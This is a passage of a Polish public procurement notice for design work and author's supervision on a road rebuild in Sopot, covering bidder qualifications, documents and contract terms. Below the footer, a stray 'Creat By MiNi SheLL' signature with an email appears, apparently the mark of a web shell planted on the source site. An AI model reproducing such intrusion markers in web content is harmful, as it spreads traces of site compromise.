class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rozwiązania projektowe zamienne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową<br/>nie mniejszą niż 100 000,00 zł (słownie: sto tysięcy złotych 00/100 zł);<br/>4) zdolności technicznej lub zawodowej – Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) Posiada niezbędna wiedzę i doświadczenie w realizacji zamówień odpowiadających<br/>przedmiotowi zamówienia - w okresie ostatnich 3 lat przed upływem terminu składania ofert w<br/>postępowaniu, a jeżeli okres działalności jest krótszy – w tym okresie, wykonał co najmniej:<br/>1 opracowanie projektowe w zakresie budowy lub przebudowy dróg o wartości opracowania<br/>minimum 50 000,00 zł brutto,<br/>1 opracowanie projektowe w zakresie budowy lub przebudowy sieci kanalizacyjnych;<br/>b) Dysponuje lub będzie dysponować osobami, które skieruje do wykonywania niniejszego<br/>zamówienia tj co najmniej:1 osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności drogowej<br/>lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów, która brała udział w wykonaniu co najmniej jednego<br/>opracowania obejmującego swym zakresem budowę/przebudowę dróg, posiadającą co najmniej<br/>3 letnie doświadczenie w projektowaniu dróg, 1 osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności<br/>konstrukcyjno- budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów, posiadającą co najmniej 3 letnie<br/>doświadczenie w projektowaniu, 1 osobą posiadającą uprawnienia do projektowania bez ograniczeń w ramach specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, posiadająca co najmniej 3 letnie doświadczenie w projektowaniu<br/>sieci kanalizacyjnych, 1 osobą posiadającą uprawnienia do projektowania bez ograniczeń w ramach specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń teletechnicznych lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, posiadająca co najmniej 3 letnie doświadczenie w projektowaniu sieci<br/>teletechnicznych<br/>Przez uprawnienia budowlane, rozumie się pełne lata czynne zawodowo od daty uzyskania<br/>uprawnień. Przez uprawnienia budowlane rozumie się uprawnienia budowlane, o których mowa<br/>w Ustawie z dnia 07 lipca 1994r. – Prawo Budowlane (t.j. Dz. U. z 2020 r., poz.1333 z<br/>późniejszymi zmianami).<br/>Zamawiający określając wymogi dla osób wymienionych powyżej w zakresie posiadanych<br/>uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów prawa oraz odpowiadające im<br/>ważne uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz<br/>Konfederacji Szwajcarskiej, z zastrzeżeniem Art. 12a, oraz innych przepisów Ustawy – Prawo<br/>Budowlane (t.j. Dz. Ustaw z 2020r., poz. 1333 z późniejszymi zmianami) oraz Ustawy z dnia 22<br/>grudnia 2015 r. o zasadach kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t.j. Dz.U. 2020 r., poz. 220 z póżn.zm.). Wymagane przez Zamawiającego osoby<br/>zdolne do wykonania niniejszego zamówienia, opisane powyżej, stanowią minimalny skład osób<br/>wymaganych do realizacji zamówienia.<br/>Nie dopuszcza się wskazywania w ofercie tej samej osoby na więcej niż jedno stanowisko ze<br/>względu na terminowe bądź techniczne ograniczenia, które mogą mieć negatywny wpływ na<br/>realizację zamówienia.<br/>Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia –<br/>nie spełnia na podstawie złożonych dokumentów.<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w rozdz. VIII<br/>niniejszej SWZ, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub<br/>jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji innych<br/>podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>3.1.Zamawiający jednocześnie informuje, iż „stosowna sytuacja”, o której mowa w rozdz. VIII.<br/>niniejszej SWZ wystąpi wyłącznie w przypadku, kiedy:<br/>1) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni<br/>Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te<br/>zrealizują roboty, do realizacji których te zdolności są wymagane.<br/>3) Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów,<br/>odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę<br/>poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że<br/>za nieudostępnienie zasobów nie ponosi winy.<br/>4) Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa,<br/>podmiotu, o którym mowa w art. 118 ust. 1 Ustawy PZP, nie potwierdzają spełnienia przez<br/>wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy<br/>wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez zamawiającego: o zastąpił ten podmiot innym podmiotem lub podmiotami lub<br/>o zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże<br/>zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną, o których mowa w<br/>art. 118 ust. 1 Ustawy PZP.<br/>4. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej -<br/>dopuszcza łączne spełnianie warunku przez Wykonawców. W takim przypadku wykonawcy do<br/>oferty dołączą oświadczenie, z którego wynika, które prace/usługi wykonają poszczególni<br/>wykonawcy.<br/>5. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospod. wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o<br/>spełnianiu warunków udziału w postęp. oraz o braku podstaw do wykluczenia z postępowania -<br/>zgodnie z Zał. nr 2 do SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy P.Z.P, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i<br/>konsumentów (t.j.Dz. U. z 2021 r. poz. 275 z póżn.zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - zał. nr 8 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy P.Z.P., sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>3) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art.125 ust.1 ustawy P.Z.P. w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego – załącznik nr 12 do SWZ.<br/>5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt 2), składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o<br/>którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 2) lub dokumenty te nie odnoszą się do wszystkich przypadków, o<br/>których mowa w art. 108 ust.1 P.Z.P. zastępuje się je w całości lub części dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą , lub<br/>jeżeli w kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">: Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych<br/>środków dowodowych, aktualnych na dzień złożenia :<br/>1) Informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem. Jeżeli Wykonawca z uzasadnionej przyczyny nie może przedstawić<br/>dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego,<br/>może przedstawić inny dokument, który w wystarczający sposób potwierdzi spełnianie opisanego<br/>przez Zamawiającego warunku;<br/>2) Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, porównywalnych z usługami stanowiącymi przedmiot<br/>zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz<br/>których usługi te zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty - zał. nr 5 do SWZ; 3)Wykaz osób, skierowanych przez wykonawcę do<br/>realizacji zam. publ., w szczególności odpowiedzialnych za projektowanie, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, upr., doświadczenia i wykształcenia niezbędnych do wykonania<br/>zam. pub. a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami - zał.nr 4 do SWZ; 1.Wykonawca może w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu polegać na zdolnościach techn. lub zawodowych podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych. 2.W odniesieniu do warunków dot. doświadczenia, Wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają świadczenie, do<br/>realizacji którego te zdolności są wymagane. 3. Wykonawca, który polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zam. lub<br/>inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi załącznik nr 6 do<br/>SWZ. 4.Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techn. lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków<br/>udziału w post., a także bada, czy nie zachodzą wobec tego podmiotu podst. wykluczenia, które zostały<br/>przewidziane względem wykonawcy.5. Jeżeli zdolności techniczne lub zawodowe podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w post. lub<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie<br/>określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał,<br/>że samodzielnie spełnia warunki udziału w post.<br/>Wykonawca, w przyp. polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>przedstawia, wraz z oświadczeniem, o którym mowa w Rozdziale X ust. 1 SWZ, także oświadczenie<br/>podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje<br/>się na jego zasoby, zgodnie z katalogiem dokumentów określ.w Rozd. X SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym - zgodnie z Załącznikiem nr 1 do SWZ. Wraz z<br/>ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy) -<br/>Załącznik nr 6 do SWZ.<br/>3) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa lub<br/>inne dokumenty, potwierdzające umocowanie do reprezentowania wykonawcy (jeżeli dotyczy).<br/>Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z<br/>dnia 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020 r. poz. 1913 ze zm.),<br/>Wykonawca powinien nie później niż w terminie składania ofert, zastrzec, że nie mogą one być<br/>udostępnione oraz wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, jaki zakres zamówienia publicznego wykonają poszczególni<br/>wykonawcy – załącznik nr 12 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonania zmian postanowień Umowy w przypadkach<br/>wynikających wprost z przepisów PZP oraz w przypadku wystąpienia co najmniej jednej z<br/>okoliczności wymienionych w ustępach poniżej, z uwzględnieniem podawanych warunków ich<br/>wprowadzenia.<br/>2. Zmiana postanowień zawartej Umowy jest możliwa w przypadkach opisanych w ust. 3<br/>niniejszego paragrafu, z zastrzeżeniem, iż zmiany te nie wykraczają poza określenie przedmiotu<br/>zamówienia publicznego zawartego w Opisie Przedmiotu Zamówienia oraz Strony Umowy<br/>wyraziły zgodę na wprowadzenie zmian.<br/>3. Zamawiający dopuszcza, zgodnie z art. 455 Ustawy PZP, możliwość zmiany istotnych<br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, w szczególności w przypadku, gdy konieczność wprowadzenia takich zmian wynika<br/>z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy. Zmiana Umowy o<br/>udzielenie niniejszego zamówienia może nastąpić w następujących przypadkach:<br/>a) Zmiana terminu wykonania Umowy:<br/>wobec konieczności wprowadzenia zmian w stosunku do Dokumentacji Projektowej w zakresie<br/>dla wykonania opracowań dodatkowych i zamiennych, nie wykraczających poza zakres<br/>przedmiotu zamówienia publicznego, na uzasadniony wniosek Jednostki Projektowej lub<br/>Zamawiającego;<br/>na skutek konieczności zmniejszenia zakresu Dokumentacji Projektowej, z jednoczesnym<br/>prawem do zmniejszenia wynagrodzenia Jednostki Projektowej, wg stawek zgodnych z Umową,<br/>przy czym zmniejszenie może nastąpić maksymalnie o 20% wartości brutto wskazanej w §6 ust.<br/>1 Umowy;<br/>z powodu działań osób trzecich uniemożliwiających wykonanie Umowy pod warunkiem, że<br/>działania te nie są konsekwencją działań którejkolwiek ze Stron;<br/>zmiany będące następstwem działania organów administracji państwowej, w szczególności<br/>odmowa wydania lub przekroczenie określonych przez prawo terminów wydawania decyzji,<br/>zezwoleń, uzgodnień oraz inne przyczyny zewnętrzne niezależne od Zamawiającego;<br/>inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Jednostki Projektowej<br/>skutkujące niemożliwością prowadzenia prac projektowych;<br/>w wyniku powstania nowych skutków epidemii COVID-19, których nie można było przewidzieć<br/>na etapie dotychczasowego przebiegu epidemii tj. w trakcie trwania postępowania, Jednostka<br/>Projektowa winna poinformować o zaistnieniu nowych nieprzewidzianych sytuacji<br/>wykraczających poza zmiany przewidziane w Umowie;<br/>zmiana terminu następuje o uzasadniony czas trwania przeszkody, bądź o czas zmian<br/>wynikający z okoliczności zmian;<br/>b) Zmiana wynagrodzenia Wykonawcy:<br/>zmiana wysokości wynagrodzenia Jednostki Projektowej wynikająca z ustawowej zmiany stawki<br/>podatku od towarów i usług (VAT);<br/>w przypadku zaistnienia zmian sposobu wykonania przedmiotu Umowy, o których mowa poniżej<br/>w punkcie c), z jednoczesnym prawem do odpowiednich zmian terminu wykonania zamówienia<br/>publicznego;<br/>w przypadku rezygnacji przez Zamawiającego z części zakresu przedmiotu zamówienia<br/>publicznego – zmniejszenie wynagrodzenia o wartość niewykonanych prac projektowych, z<br/>jednoczesnym prawem do zmiany terminu wykonania zamówienia publicznego;<br/>zmiana wynagrodzenia będzie ustalana na podstawie cen umownych dla każdego elementu<br/>Dokumentacji Projektowej, zmiana wynagrodzenia zostanie określona w oparciu o<br/>Środowiskowe Zasady Wycen Prac Projektowych przy założeniu, że stawki j.n.p. zostaną<br/>przyjęte w wysokości średniej opublikowanej w ŚZWPP za poprzedni kwartał w stosunku do dnia<br/>wystąpienia okoliczności powodującej konieczność zmiany wynagrodzenia Wykonawcy;<br/>wszystkie zmiany umowy opisane w zał. nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę należy składać na Platformie SMARTPZP https://portal.smartpzp.pl/zdizsopot</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-16 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Jeżeli Zamawiający zdecyduje się na przeprowadzenie negocjacji, wówczas:<br/>a) zaprosi do negocjacji maksymalnie trzech wykonawców, których oferty zostaną najwyżej<br/>ocenione (z największą liczbą przyznanych punktów łącznie);<br/>b) negocjacje odbywać się będą w zakresie ceny oferty brutto, czasu reakcji zespołu<br/>Projektantów i deklarowanych rozwiązań projektowych zamiennych;<br/>c) kryteria oceny ofert dodatkowych- zgodnie z Rozdz. XIX SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa zadania: Wykonanie wielobranżowej dokumentacji projektowej wraz z pełnieniem<br/>nadzoru autorskiego w trakcie realizacji inwestycji pn. Przebudowa układu drogowego (z<br/>wyłączeniem sieci oświetlenia ulicznego) z uwzględnieniem budowy kanału technologicznego w<br/>ul. Sobieskiego na odcinku od ul. Bohaterów Monte Cassino do ul. Chopina w Sopocie.<br/>Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do wniesienia<br/>zabezpieczenia należytego wykonania umowy najpóźniej w dniu jej zawarcia, w wysokości 5%<br/>ceny całkowitej brutto podanej w ofercie.<br/>c.d. zmian umowy: c) Zmiana sposobu wykonania przedmiotu Umowy:<br/>zmiana zakresu opracowania dokumentacji z jednoczesnym prawem do odpowiednich zmian<br/>wynagrodzenia Jednostki Projektowej;<br/>aktualizacja/zmiana rozwiązań technicznych z uwagi na postęp technologiczny lub zmiany<br/>obowiązujących przepisów;<br/>zmniejszenie zakresu prac projektowych objętych przedmiotem niniejszego zamówienia<br/>publicznego, z jednoczesnym prawem do zmniejszenia wynagrodzenia Jednostki Projektowej<br/>wg stawek zgodnych z Umową, przy czym zmniejszenie może nastąpić maksymalnie o 20%<br/>wartości wynagrodzenia brutto wskazanej w §6 ust. 1 Umowy;<br/>rozszerzenie zakresu podwykonawstwa w porównaniu do podanego w Ofercie Jednostki<br/>Projektowej; w przypadku zaistnienia korzyści dla Zamawiającego takich, jak skrócenie terminu<br/>wykonania przedmiotu zamówienia publicznego lub zastosowania bardziej zaawansowanych<br/>rozwiązań technologicznych;<br/>d) Inne zmiany w zał, nr 7 do SWZ</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com